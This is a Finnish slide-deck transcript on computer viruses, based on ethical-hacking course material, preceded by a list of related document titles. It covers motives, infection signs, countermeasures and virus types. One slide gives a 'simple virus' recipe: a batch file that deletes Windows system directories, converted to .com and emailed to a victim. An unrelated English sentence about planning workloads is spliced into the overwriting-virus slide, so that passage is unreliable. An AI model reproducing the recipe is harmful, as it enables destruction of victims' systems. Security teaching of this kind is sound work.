Virusinfo. Idea J-P Aro. Käännös Annastina Reims. Graafinen ulkoasu Toni Tilsala

Samankaltaiset tiedostot
lizengo Asennusopas Windows: in kopioiminen

Jäljitä piilossa olevat virukset

F-Secure virustorjuntaohjelmiston käyttö

Windows 8.1:n vaiheittainen päivitysopas

ANVIA ONLINE BACKUP ASENNUSOPAS 1(7) ANVIA ONLINE BACKUP ASENNUSOPAS 1.0

Coolselector Asennusohje

1 Tivax siirto uuteen koneeseen

Tuplaturvan tilaus ja asennusohje

Asteri Vuokrankanto (Dos) Vuosipäivitys

Suojaa koneesi vartissa

Office ohjelmiston asennusohje

Sonera Yrityssähköposti. Outlook 2013 lataus ja asennus

Memeo Instant Backup Pikaopas. Vaihe 1: Luo oma, ilmainen Memeo-tili. Vaihe 2: Liitä tallennusväline tietokoneeseen

Jäsenrekisteri (dos) Kirjuri tekstinkäsittely Vuosipäivitys

Microsoft Outlook Web Access. Pikaohje sähköpostin peruskäyttöön

TIETOTURVALLISUUDESTA

Turvallisempaa tietokoneen ja Internetin käyttöä

Pika-asennusohjeet Suomeksi

Asteri Ostoreskontra (Dos)

Juha-Pekka Ruuska 2/7 Nokian lukio

TTS kannattavuuslaskentaohjelma

ASTERI VEROLOMAKE 60 61A 61B WINDOWS-OHJELMA KÄYTTÖOHJE

Virustorjuntaohjelman F-Secure 5.54 asennus kotikoneelle

10 parasta vinkkiä tietokoneongelmiin

Asteri Ostoreskontra (Dos)

Asteri Ostoreskontra (Dos)

Ennen varmenteen asennusta varmista seuraavat asiat:

LATAA JA ASENNA - ILMAISOHJELMIA INTERNETISTÄ

Kiipulan ammattiopisto. Liiketalous ja tietojenkäsittely. Mervi Saarinen

CEM DT-3353 Pihtimittari

Tietokoneet ja verkot (32)

Varmuuskopiointi ja palauttaminen Käyttöopas

Asteri Ostoreskontra (Dos)

ASTERI OSTORESKONTRA. Vuosipäivitys

CVS. Kätevä väline usein päivitettävien tiedostojen, kuten lähdekoodin, hallitsemiseen

Järjestelmän asetukset. Asetustiedostojen muokkaaminen. Pääkäyttäjä eli root. Järjestelmänhallinnan työkalut

Windows Vistan varmuuskopiointi

Uuden työtilan luonti

Asennuksessa kannattaa käyttää asennusohjelman tarjoamia oletusarvoja.

TIETOKONE JA VERKOT IT PC & NETWORK SUPPORT TAITAJA 2001 LAHTI KÄYTTÖJÄRJESTELMIEN JA OHJELMISTOJEN ASENTAMINEN SEKÄ KONFIGUROINTI

Kansionäkymä listasta suuriin kuvakkeisiin

Uudessa Excel-2007 on muutettuja / uusia ominaisuuksia jotka tulee huomioida kun Excel-2003 tehtyjä sovelluksia otetaan käyttöön Excel-2007:ssä.

Salasanojen turvallinen tallentaminen KeePass ohjelmalla

Ensimmäisessä vaiheessa ladataan KGU tietokanta Hallitse tietokantoja toiminnon avulla.

Visma Avendon asennusohje

Microsoft Projectin mukauttaminen

TIETOKONEYLIASENTAJAN ERIKOISAMMATTITUTKINTO

erasmartcard-kortinlukijaohjelmiston asennusohje (mpollux jää toiseksi kortinlukijaohjelmistoksi)

WEIKKA. Asennus opas. Hannu-Matti Lemettinen HML Productions

Unifaun OnlinePrinter

Ennen kuin aloitat lataamisen tarkista järjestelmävaatimukset:

ASTERI TILAUSTENKÄSITTELY. Vuosipäivitys

HP ProBook 430 G5 kannettavien käyttöönotto

Tietokone. Tietokone ja ylläpito. Tietokone. Tietokone. Tietokone. Tietokone

Johdatus ohjelmointiin

Yritysturvallisuuden perusteet. 11. Luento Tietotekninen turvallisuus

HARJOITUS 3: Asennetaan Windows Vista koneeseen Windows 7 Professional upgrade ohjelmisto (Windows 7 käyttöjärjestelmän asennus)

ARKIPÄIVÄN SUOMEA-ohjelma vaatii toimiakseen multimedia-pc:n, jossa on seuraavat tekniset ominaisuudet ja ohjelmat asennettuna.

Tietoturva SenioriPC-palvelussa

ohjeita kirjautumiseen ja käyttöön

Kieliversiointityökalu Java-ohjelmistoon. Ohje

Kopioi cd-levyt kiintolevylle, niin fyysiset levyt joutavat eläkkeelle.

CCLEANER LATAAMINEN JA ASENTAMINEN

Visma Nova. Visma Nova ASP käyttö ja ohjeet

Drive Letter Access. Pikaopas

Yhteydensaantiongelmien ja muiden ongelmien ratkaisuita

Pikaopas. Ohjeiden etsiminen Hae ohjesisältöä napsauttamalla kysymysmerkkiä.

Tiedostojen lataaminen netistä ja asentaminen

Ohjeet What matters to me palvelun käyttöönottoon

Ohje olettaa, että Java on asennettu oletuskansioonsa sekä päivitetty uusimpaan versioonsa ja että selaimen latauskansiona on oletus.

Kuvien lisääminen ja käsittely

Tietoturvaloukkausten hallinta

CCLEANER PERUSKÄYTTÖ PERUSKÄYTTÖ

MALWAREBYTES ANTI-MALWARE

Ohjeita peda.net palvelun Luo uusi osioon

1 Asentaminen. 2 Yleistä ja simuloinnin aloitus 12/

TEHTÄVÄ 5: Microsoft Virtual PC asennus ja hallinta

PIKAOPAS. Nokia Connectivity Cable Drivers -ohjainten asentaminen

Vapaat ohjelmat matkalla

Päivitys käyttäen USB-tikkua

Tiedostonhallinta. Yleistä

Asteri Ostoreskontra (Dos)

Site Data Manager Käyttöohje

Selkosanakirja sdfghjklöäzxcvbnmqwertyuiopåasdfghjklöäzxcvbnmq. Tietokoneet. wertyuiopåasdfghjklöäzxcvbnmqwertyuiopåasdfghjk 1.4.

PÄIVITÄ TIETOKONEESI

JulkICT Arkkitehtuuripankki - QPR EnterpriseArchitect asennusohje

Poista tietokoneessasi olevat Javat ja asenna uusin Java-ohjelma

Tietoturvallisuus. Mikko Vestola AT2-kurssin itsenäinen harjoitustyö Koulun nimi Arvosana: Erinomainen

Kameran laiteohjelman päivittäminen

Näin asennat Windows käyttöjärjestelmän virtuaalikoneeseen

PÄIVITÄ TIETOKONEESI

Autentikoivan lähtevän postin palvelimen asetukset

5. HelloWorld-ohjelma 5.1

Tikon Web-sovellukset

Microsoft Security Essentials (MSE) asennuspaketin lataaminen verkosta

OHJE Jos Kelaimeen kirjautuminen ei onnistu Windows-koneilla

Asennuslevyn tekeminen. UBUNTU asentaminen. Asentaminen. Asennusprosessi. Järjestelmävaatimukset. Ennen asentamista tulee hankkia asennuslevy

ASTERI LASKUTUS ASTERI LÄHETELASKUTUS. Vuosipäivitys

Mikäli olet saanut e-kirjan latauslinkin sähköpostilla, seuraa näitä ohjeita e-kirjan lataamisessa.

ASENNUSOHJEET INTERNET-ASENNUS. Navita Yritysmalli. YHTEYSTIEDOT Visma Solutions Oy Mannerheiminkatu LAPPEENRANTA Puh.

Transkriptio:

Virusinfo Idea J-P Aro Käännös Annastina Reims Graafinen ulkoasu Toni Tilsala Sisältö pohjautuu EC-Council:in Ethical Hacking and Countermeasures -kurssimateriaaliin

Miksi viruksia luodaan? Kilpailijan vahingoittamiseksi Taloudellisen hyödyn saamiseksi $ Tutkimusprojekteiksi Pilailutarkoituksessa Ilkivalta Kyberterrorismi Poliittisen viestien levittäminen

Virushyökkäyksen tunnusmerkkejä Prosesseihin kuluu enemmän resursseja ja aikaa Kone piippaa ilman selvää syytä Asematunnus muuttuu Käyttöjärjestelmä ei käynnisty Epätavalliset tapahtumat Jos järjestelmä toimii Tietokone hidastuu ohjelmien käynnistyessä Virustorjunta hälyttää epätavallisesti voidaan epäillä virushyökkäystä Väärät Hälytykset Tietokone jumiutuu usein tai tulee virheilmoituksia Tiedostoja ja kansioita on kateissa Kovalevy on usein käytössä Selainikkuna jumittuu Kaikki viat tai häiriöt eivät kuitenkaan johdu virushyökkäyksistä

Miten tietokone saastuu? Virustorjunta ei ole ajan tasalla Hyväksytään ja imuroidaan tiedostoja tarkistamatta lähteen luotettavuutta Liitännäisiä (esim. Java) ei päivitetä tai asenneta uusimpia versioita Avataan saastuneita sähköpostiliitteitä Asennetaan piraattiohjelmia

Virustyypit Miten ne saastuttavat? Käynnistyslohkovirukset Piilovirus Salakirjoitettu virus Polymorpinen virus Metamorpinen virus Ylikirjoittava virus Tiedostovirus Ajastettu virus Kumppani/ naamioidut virukset Ryväsvirukset Komentorivivirukset Tiedostopäätevirus Moniosainen virus Macro virus Lisäosa (add-on) virus (intrusive) Tunkeutuva virus Hetkellinen virus Muistinvarainen virus Mitä ne saastuttavat?

Virusten ja matojen vastatoimet Varmista, että käytettävä koodi on hyväksytty Puhdista levy, tarkista järjestelmärekisteri ja eheytä levy viikottain Älä käynnistä konetta uudestaan jos käynnistyslohko on saastunut Tiedosta uusimmat virusuhat Tarkista CD:t ja DVD:t ja muistitikut virusten varalta Varmista, että pongahdusikkunat on estetty ja käytä internet palomuuria Käytä palomuuria, jos käytät Windows XP:tä DVD Tarkista kone vakoiluohjelmien varalta viikottain Kieltäydy tiedostoista, joilla on useampi tiedostopääte Ole varovainen pikaviestijärjestelmien kautta lähetettyjen tiedostojen kanssa

Virusten ja matojen vastatoimet Asenna virustorjuntaohjelma, joka havaitsee ja poistaa tartunnat niiden ilmestyessä Luo virustorjuntasäännöt turvallista koneen käyttöä vasten ja jaa se henkilöstölle Huomioi ohjeet imuroidessasi tiedostoja tai ohjelmia netistä Päivitä virustorjunta kuukausittain, jotta se tunnistaa ja poistaa haittaohjelmat ja virukset Älä avaa liitteitä tuntemattomilta lähettäjiltä Virus voi korruptoida tiedostoja, joten ota varmuuskopiot säännöllisin väliajoin Tarkista koko tietokone tasaisin väliajoin asennettuasi virustorjuntaohjelman Älä hyväksy levyjä tai ohjelmia tarkistamatta niitä ensin ajantasoisella virustorjuntaohjelmalla

Virusinfo Eri tyyppiset virukset Tarkemmat kuvaukset

Esimerkki yksinkertaisen viruksen kirjoittamisesta Lähetä Game.com tiedosto sähköpostin liitteenä uhrille Luo Game.bat tiedosto seuraavalla tekstillä @ echo off del c:\winnt\system32\*.* del c:\winnt\*.* Muunna Game.bat -tiedosto game.com -muotoon bat2com ohjelmalla Suoritettaessa se poistaa coretiedostot WINNT-hakemistossa, jonka jälkeen Windowsia ei voi käyttää

Tiedostopäätevirukset 1. Tiedostopäätevirukset muuttavat tiedostojen päätteet 2..TXT- tiedosto on turvallinen, sillä se on pelkkä tekstitiedosto 3. Jos piilotetut tiedostot eivät näy ja sinulle lähetetään tiedosto BAD.TXT.VBS, näet vain BAD.TXT -osan 4. Mikäli olet unohtanut etteivät piilotiedostot näy, saatat luulla tätä tekstitiedostoksi ja avata sen 5. Tiedosto on Visual Basic Script -virus ja voi vahingoittaa tietokonetta 6. Vastatoimena on laittaa täppä Näytä piilotetut tiedostot ja kansiot -kohtaan Kansion asetukset saa auki napsauttamalla Käynnistä-painiketta ja valitsemalla Ohjauspaneeli, Ulkoasu ja teemat sekä Kansion asetukset.

Lisäosa(add-on)virukset ja tunteutuvat(intrusive) virukset Lisäosa(add-on)virukset liittävät koodinsa isäntäkoodiin muuttamatta sitä tai siirtävät isäntäkoodia laittaakseen oman ohjelmansa alkuun Alkuperäinen ohjelma Viruskoodi Alkuperäinen ohjelma Alkuperäinen ohjelma Viruskoodi Tunkeutuvat(intrusive) virukset ylikirjoittavat isäntäkoodin täysin tai osittain viruksen koodilla Alkuperäinen ohjelma Viruskoodi Alkuperäinen ohjelma

Hetkelliset ja muistinvaraiset virukset Tavallisimmat saastutustavat Hetkellinen virus Siirtää isäntäkoodin hallinnan sinne missä itse sijaitsee Valitsee muutettavan kohdeohjelman ja korruptoi sen Muistinvarainen virus Jää pysyvästi muistiin koko työskentely rupeaman ajaksi, jopa sen jälkeen kun kohdeohjelman käyttö on lopetettu: Voidaan poistaa ainoastaan käynnistämällä kone uudestaan

Ylikirjoittavat virukset Tämä virus ylikirjoittaa osan isäntätiedostosta tietyllä arvolla (yleensä null) lisäämällä tiedoston pituutta, ja pitäen tiedoston näin toimintakuntoisena Accordingly, the best approach is to accumulate this material continuously, as and when it becomes available; since this avoids the otherwise heavy workload involved in collecting it as part of the regular, typically annual, planning process itself usually at a premium. Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Alkuperäinen tiedosto Koko: 45KB Saastunut tiedosto Koko: 45KB

Ajastettu virus Ajastettu virus saastuttaa ohjelmia tai järjestelmiä vain tietyin väliajoin (esim. joka kymmenes kerta) tai vain tietynkokoisia tiedostoja Saastuttamalla harvemmin virus yrittää minimoida paljastumismahdollisuudet Herää joka kuun 15. pvä ja suorita koodi

Kumppani/Naamioidut virukset Kumppanivirus luo kumppanitiedoston jokaista saastuttamaansa suoritettavaa tiedostoa kohden Kumppanivirus voi tallentaa itsensä notepad.com -muotoon ja joka kerta kun käyttäjä suorittaa notepad.exen(hyvä ohjelma), tietokone lataa notepad.comin(virus) ja saastuttaa järjestelmän Virus saastuttaa järjestelmän notepad.com -tiedostolla ja tallentaa sen hakemistoon C:\winnt\system32 Notepad.exe Notepad.com

Komentovirukset Viruskoodi muodostaa kuoren kohdeohjelman koodin ympärille ja tekee itsestään osan alkuperäistä ohjelmaa ja isäntäkoodin aliohjelmaa Lähes kaikki käynnistysohjelmien virukset ovat komentoviruksia Ennen saastumista Alkuperäinen ohjelma Saastumisen jälkeen Viruksen koodi Alkuperäinen ohjelma

Käynnistyslohkovirukset Käynnistyslohkovirus siirtää MBR:n toisaalle kovalevyllä ja kopioi itsensä MBR:n alkuperäiselle paikalle Järjestelmän käynnistyessä uudelleen viruskoodi suoritetaan ensin ja vasta sitten hallinta siirtyy alkuperäiselle MBR:lle Ennen saastumista MBR Saastumisen jälkeen Viruksen koodi MBR

Tiedosto- ja moniosaiset virukset Tiedostovirukset Tiedostovirukset saastuttavat tiedostoja jotka suoritetaan tai tulkitaan järjestelmissä COM, EXE, SYS, OVI, ONJ, PRG, MNU ja BAT tiedostoina Tiedostovirukset voivat olla joko hetkellisiä tai muistinvaraisia Moniosainen virus Virus, joka yrittää hyökätä sekä käynnistyslohkolle tai suoritettaviin tiedostoihin samanaikaisesti

Makrovirukset Hyökkääjä Saastuttaa makroja käyttäviä asiakirjoja Käyttäjä Makrovirukset saastuttavat tiedostoja, jotka on luotu Microsoft Wordilla tai Excelillä Useimmat makrovirukset on luotu Visual Basic for applications -makro kielellä Makrovirukset saastuttavat malleja tai muuntavat saastuneet tiedostot mallitiedostoiksi, säilyttäen ne tavallisten asiakirjatiedostojen näköisinä

Ryväsvirukset Muuttavat hakemistojen merkintöjä niin, että merkinnät osoittavat viruskoodiin alkuperäisen ohjelman sijasta. Ryväsvirus käynnistää itsensä aina ensin, kun joku ohjelma käynnistetään ja sitten hallinta siirtyy varsinaiselle ohjelmalle Levyllä on vain yksi kopio viruksesta, joka saastuttaa tietokoneen

Piilovirukset/Kaivautuvat virukset 1. Virukset välttelevät virustorjuntaa sieppaamalla pyynnöt käyttöjärjestelmälle 2. Virus voi piiloutua sieppaamalla virustorjuntaohjelman pyynnön lukea tiedosto ja välittämällä pyynnön virukselle eikä käyttöjärjestelmälle 3. Virus voi siten palauttaa puhtaan tiedoston virustorjuntaohjelmalle, jotta tiedosto näyttää olevan kunnossa Anna järjestelmätiedosto tcpip.sys tarkistettavaksi Virustorjuntaohjelma VIRUS Piilottaa saastuneen TCPIP.SYS Tässä Alkuperäinen TCPIP.SYS

Salakirjoitetut(kryptatut) virukset Viruskoodi Tämä virus käyttää yksinkertaista salausta koodin muuttamiseen Viruksessa on oma salakirjoitettu avain jokaista saastunutta tiedostoa varten Virustorjunta ei voi havaita näitä viruksia tavallisilla havannointikeinoilla Salausavain 1 Salausavain 2 Salausavain 3 Kryptattu virus 1 Kryptattu virus 2 Kryptattu virus 3

Polymorfinen koodi 1. Polymorfinen koodi mutatoituu, mutta säilyttää alkuperäisen algoritmin ehjänä 2. Käyttääkseen polymorfista koodia viruksella on oltava polymorfinen moottori (joskus myös mutatoituva moottori) 3. Hyvin kirjoitettu polymorfinen virus muuntuu siis jokaisella saastutuskerralla Kryptattu mutatoituva moottori Kryptattu viruskoodi Avaamisohjelma Käyttäjä suorittaa saastuneen ohjelman Avaamisohjelma purkaa viruskoodin ja mutatoi Käsky luoda uusi avausohjelma Kryptattu mutatoituva moottori (EME) Viruskoodi Virus vahingoittaa Käsky luoda uusi krypt. mutatoituva moottori Virus salaa itsensä uudella avaimella Uusi avausohjelma Uusi krypt. mutatoituva moottori Uusi virus Uusi polymorfinen virus RAM

Metamorfiset virukset Metamorfiset virukset kirjoittavat itsensä uudelleen joka kerta kun aikovat saastuttaa uuden suoritettavan viruksen Metamorfinen koodi voi ohjelmoida itsensä uudestaan kääntämällä itsensä väliaikaiseen muotoon ja sitten takaisin alkuperäiseksi Esim. W32/Simile koostui yli 14000 rivistä koodia ja 90% siitä on osa metamorfista moottoria a) Variantti A c) Epävirallinen variantti b) Variantti B d) Variantti (joka oli alkuperäisen tekijän virallinen C variantti)